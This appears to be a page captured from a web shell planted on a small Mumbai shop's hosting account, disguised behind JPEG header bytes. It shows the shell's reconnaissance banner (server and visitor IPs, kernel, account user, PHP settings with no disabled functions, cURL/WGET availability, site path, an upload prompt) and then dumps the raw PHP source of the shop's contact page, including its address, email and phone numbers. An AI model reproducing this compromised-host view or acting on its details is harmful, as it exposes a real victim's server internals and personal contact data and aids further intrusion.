���� JFIF fdasasfas213sdaf
Server IP : 88.222.243.29 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/mahavirmillstores.co/public_html/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Contact - Mahavir Mill Stores</title> <?php include 'assets.php' ?> </head> <body> <?php include 'header.php' ?> <!-- breadcrumb area start --> <div class="rts-breadcrumb-area breadcrumb-bg bg_image"> <div class="container"> <div class="row align-items-center"> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12 col-12 breadcrumb-1"> <h1 class="title">Contact Us</h1> </div> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12 col-12"> <div class="bread-tag"> <a href="index.php">Home</a> <span> / </span> <a href="javascript:void(0);" class="active">Contact Us</a> </div> </div> </div> </div> </div> <div class="rts-contact-form-area"> <div class="container"> <div class="row"> <div class="col-12"> <div class="rts-contact-fluid rts-section-gap"> <div class="rts-title-area contact-fluid text-center mb--50"> <p class="pre-title"> Needs Help? </p> <h2 class="title">Let’s Get in Touch</h2> </div> <div class="row"> <div class="col-md-6 ps-5"> <h5>Mahavir Mill Stores</h5> <ul class="list-group list-group-flush"> <li class="list-group-item"> <h6><i class="fas fa-globe-europe"></i> Address:</h6> <p class="grey-color"> 44, Ground Floor, Nagdevi Commerce Chambers Co Op Society, Nagdevi Cross Lane, Mumbai - 400003, Maharashtra, India </p> </li> <li class="list-group-item"> <h6> <i class="fas fa-envelope-open-text"></i> Email Address: </h6> <p class="mb-3"> bijalsanghavi72@gmail.com </p> </li> <li class="list-group-item"> <h6> <i class="fas fa-phone-square-alt"></i> Phone: </h6> <p>(+91) 9324-331-213, (+91) 836-969-6123</p> </li> </ul> </div> <div class="col-md-6"> <h5 class="ms-5 ps-5">Send A Message</h5> <div class="form-wrapper"> <div id="form-messages"></div> <?php include 'common-form.php' ?> </div> </div> </div> </div> </div> </div> </div> </div> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3773.5285863435947!2d72.83095377495208!3d18.952249255846283!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3be7cfe379e00681%3A0x5151171279c5e21!2sNagdevi!5e0!3m2!1sen!2sin!4v1737438125621!5m2!1sen!2sin" width="100%" height="450" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> <!-- contact address --> <?php include 'footer.php' ?> </body> </html>